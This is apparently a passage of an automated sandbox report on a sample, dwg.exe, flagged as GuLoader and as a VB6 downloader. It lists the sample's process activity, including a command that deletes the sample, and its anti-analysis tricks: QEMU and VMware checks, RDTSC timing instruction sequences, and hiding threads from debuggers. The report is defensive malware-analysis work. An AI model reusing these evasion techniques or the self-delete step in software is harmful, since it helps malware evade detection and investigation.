      Source: C:\Users\user\Desktop\dwg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: dwg.exeReversingLabs: Detection: 27%
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbGCTL source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165A66 push eax; ret
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E29D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565A66 push eax; ret
      Source: C:\Windows\explorer.exeCode function: 4_2_07410B20 push cs; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07411BF3 push 75CE108Ch; ret
      Source: C:\Windows\explorer.exeCode function: 4_2_07415397 push ss; iretd
      Source: C:\Windows\explorer.exeCode function: 4_2_07411998 push ss; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_0741503B push ebx; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07411CD9 push cs; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07412AEF push es; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0446D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A583D push 0000003Fh; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A533F push FFFFFF96h; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019C32F push es; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB3D5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB42B push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB422 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB48C push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5CD9 push C872E20Ah; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5D64 push edx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001ACE0D push ss; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019CF58 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216587D LoadLibraryA,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D LoadLibraryA,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: dwg.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002162C75 second address: 0000000002162C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000562C75 second address: 0000000000562C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000001985F4 second address: 00000000001985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000019898E second address: 0000000000198994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B rdtsc
      Source: C:\Windows\explorer.exe TID: 6728Thread sleep time: -35000s >= -30000s
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000004.00000000.288554019.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: explorer.exe, 00000004.00000000.275549634.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000004.00000000.275611265.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA36
      Source: dwg.exe, 00000001.00000003.269507023.0000000000A38000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000004.00000000.273584197.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000004.00000000.283148438.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: dwg.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\dwg.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02163A2C LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161E12 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02164AB9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02164F41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161FF8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162C30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216587D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165866 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021658D6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02161968 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E278E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2716E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2576E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2736CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E288EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E258794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2837F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3014FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2CA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E283D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2F3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E267D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2735A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]
